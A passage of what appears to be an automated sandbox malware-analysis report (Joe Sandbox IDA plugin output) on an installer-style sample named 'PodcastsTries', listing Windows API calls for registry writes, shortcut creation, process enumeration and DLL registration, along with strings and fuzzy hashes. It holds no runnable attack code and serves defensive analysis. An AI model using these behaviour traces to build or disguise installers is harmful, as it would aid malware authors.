                                                                                                                                                                                                                                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                          • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                          • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                          • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                          • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                          • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                          • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                          • String ID: F$N$open
                                                                                                                                                                                                                                                                                                          • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                          • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                          • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                          • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                          • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                          • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                          • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                          • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                          • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                          • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                          • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                          • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                          • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                          • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                                          • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                          • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
